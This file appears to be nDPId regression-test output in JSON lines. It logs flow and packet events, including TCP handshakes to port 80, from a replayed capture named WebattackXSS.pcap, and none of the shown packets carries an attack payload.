-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347082084,"flow_last_seen":1499347087636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347083358,"flow_last_seen":1499347088637,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53436,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347083358,"flow_last_seen":1499347088637,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1967,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347202722,"flow_last_seen":1499347202722,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347202722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54688,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1967,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1499347202722,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347202722,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83mxAAD4G52OsEAABwKgKMtWgAFD5fxMfAAAAAKACchCtxwAAAgQFtAQCCAoBOc1zAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1968,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":2,"flow_last_seen":1499347202722,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347202722,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1aA8zHVU+X8TIKAScSBZuAAAAgQFtAQCCAoD457qATnNcwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":3,"flow_last_seen":1499347202722,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347202722,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03m1AAD4G52qsEAABwKgKMtWgAFD5fxMgPMx1VYAQAOX4vwAAAQEICgE5zXMD457q"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1982,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347205214,"flow_last_seen":1499347205214,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347205214,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54714,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1982,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1499347205214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347205214,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZeBAAD4GX\/CsEAABwKgKMtW6AFAegaoCAAAAAKACchDvWQAAAgQFtAQCCAoBOc\/iAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1983,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":2,"flow_last_seen":1499347205214,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347205214,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1bp74sNGHoGqA6AScSAL0wAAAgQFtAQCCAoD46FZATnP4gEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1985,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":3,"flow_last_seen":1499347205215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347205215,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZeFAAD4GX\/esEAABwKgKMtW6AFAegaoDe+LDR4AQAOWq2QAAAQEICgE5z+MD46FZ"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1994,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347206497,"flow_last_seen":1499347206497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347206497,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1994,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1499347206497,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347206497,"pkt":"ABm5CmnxAMGxFOsxCABFAAA85d9AAD4G3\/CsEAABwKgKMtXIAFBJFTT8AAAAAKACchA4fQAAAgQFtAQCCAoBOdEjAAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1995,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":2,"flow_last_seen":1499347206497,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347206497,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1cindk\/NSRU0\/aAScSCbmwAAAgQFtAQCCAoD46KZATnRIwEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1996,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":3,"flow_last_seen":1499347206498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347206498,"pkt":"ABm5CmnxAMGxFOsxCABFAAA05eBAAD4G3\/esEAABwKgKMtXIAFBJFTT9p3ZPzoAQAOU6owAAAQEICgE50SMD46KZ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2006,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347207764,"flow_last_seen":1499347207764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347207764,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54742,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2006,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1499347207764,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347207764,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oEFAAD4GJY+sEAABwKgKMtXWAFBZgnIhAAAAAKACchDpnwAAAgQFtAQCCAoBOdJgAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2007,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":2,"flow_last_seen":1499347207764,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347207764,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1dboCFwKWYJyIqAScSD+sQAAAgQFtAQCCAoD46PWATnSYAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2008,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":3,"flow_last_seen":1499347207765,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347207765,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oEJAAD4GJZasEAABwKgKMtXWAFBZgnIi6AhcC4AQAOWduQAAAQEICgE50mAD46PW"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2024,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347210270,"flow_last_seen":1499347210270,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347210270,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2024,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1499347210270,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347210270,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8H3tAAD4GplWsEAABwKgKMtXwAFCR7supAAAAAKACchBVHwAAAgQFtAQCCAoBOdTSAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2025,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":1499347210270,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347210270,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1fCjgnLike7LqqAScSCVbAAAAgQFtAQCCAoD46ZJATnU0gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2026,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":3,"flow_last_seen":1499347210270,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347210270,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0H3xAAD4GplysEAABwKgKMtXwAFCR7suqo4Jy44AQAOU0dAAAAQEICgE51NID46ZJ"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2037,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347211522,"flow_last_seen":1499347211522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211522,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54782,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2037,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1499347211522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347211522,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86VZAAD4G3HmsEAABwKgKMtX+AFCmKj9dAAAAAKACchDL6AAAAgQFtAQCCAoBOdYLAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2038,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":1499347211522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347211522,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1f624YVgpio\/XqAScSDlHwAAAgQFtAQCCAoD46eCATnWCwEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2039,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":1499347211523,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347211523,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06VdAAD4G3ICsEAABwKgKMtX+AFCmKj9etuGFYYAQAOWEJgAAAQEICgE51gwD46eC"} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347084644,"flow_last_seen":1499347090638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53450,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347084644,"flow_last_seen":1499347090638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53450,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347087256,"flow_last_seen":1499347092638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53476,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347087256,"flow_last_seen":1499347092638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347088552,"flow_last_seen":1499347093638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53490,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347088552,"flow_last_seen":1499347093638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347091102,"flow_last_seen":1499347096639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53516,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347091102,"flow_last_seen":1499347096639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347092374,"flow_last_seen":1499347097640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53530,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347092374,"flow_last_seen":1499347097640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347093662,"flow_last_seen":1499347099640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53544,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347093662,"flow_last_seen":1499347099640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211674,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53544,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2057,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347214088,"flow_last_seen":1499347214088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347214088,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2057,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1499347214088,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347214088,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8KIZAAD4GnUqsEAABwKgKMtYYAFAozfALAAAAAKACchCV+wAAAgQFtAQCCAoBOdiNAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2058,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":1499347214089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347214089,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1hgNeWHdKM3wDKAScSB5nQAAAgQFtAQCCAoD46oDATnYjQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2059,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":3,"flow_last_seen":1499347214089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347214089,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KIdAAD4GnVGsEAABwKgKMtYYAFAozfAMDXlh3oAQAOUYpQAAAQEICgE52I0D46oD"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2066,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347215361,"flow_last_seen":1499347215361,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347215361,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2066,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1499347215361,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347215361,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dFpAAD4GUXasEAABwKgKMtYmAFDVm62RAAAAAKACchAqWwAAAgQFtAQCCAoBOdnLAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2067,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":2,"flow_last_seen":1499347215361,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347215361,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1iYsMlMv1ZutkqAScSD8swAAAgQFtAQCCAoD46tBATnZywEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2068,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":3,"flow_last_seen":1499347215362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347215362,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dFtAAD4GUX2sEAABwKgKMtYmAFDVm62SLDJTMIAQAOWbuwAAAQEICgE52csD46tB"} 
